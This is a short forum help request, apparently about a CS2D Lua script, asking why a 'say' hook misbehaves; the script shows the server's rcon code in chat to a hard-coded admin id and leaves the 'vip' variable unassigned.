![IMG:https://resmim.net/preview/pIUozW.jpg<br>](https://resmim.net/preview/pIUozW.jpg<br>
)
Does anyone know why this is happening?
![>](img/i_next.png)
1
2
3
4
5
6
7
8
9
10
11
12
2
3
4
5
6
7
8
9
10
11
12
admin =142925 vip = addhook("say","argo") function argo(id,txt) if player(id,"usgn")==admin and txt== "rcon" then msg2(id,"©255255255rcon kodu : "..game("sv_rcon").."") 	 end if player(id,"usgn")==vip and txt== "rconcode" then msg2(id,"You really ") end end